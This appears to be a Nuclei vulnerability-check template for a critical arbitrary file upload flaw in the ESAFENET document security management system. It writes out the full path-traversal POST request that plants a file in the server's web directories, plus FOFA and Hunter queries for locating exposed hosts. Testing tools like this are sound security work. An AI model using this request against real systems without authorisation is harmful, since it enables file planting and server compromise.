id: esafenet-cdgserver3-decryptapplicationService2-fileupload

info:
  name: 亿赛通文档安全管理系统任意文件上传
  author: cmz
  severity: critical
  tags: esafenet,fileupload
  description: 亿赛通文档安全管理系统DecryptApplicationService2存在文件上传漏洞
  reference: 
    - https://
  metadata:
    max-request: 2
    verified: true
    fofa-query: title="亿赛通文档安全管理系统"
    hunter-query: app.name="ESAFENET 亿赛通文档安全管理系统"
    
variables:
  v1: '{{rand_base(4)}}'
  
http:
  - raw:
      - |
        POST /CDGServer3/DecryptApplicationService2?fileId=../../../Progra~2/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/{{v1}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Length: 179

        {{randstr}}
      
      - |
        GET /CDGServer3/{{v1}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 138
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains((body_2), '{{randstr}}')"
        condition: and

# 写到ROOT网站根目录
# /CDGServer3/DecryptApplicationService2?fileId=../../../Progra~2/ESAFENET/CDocGuard+Server/tomcat64/webapps/ROOT/{{v1}}.txt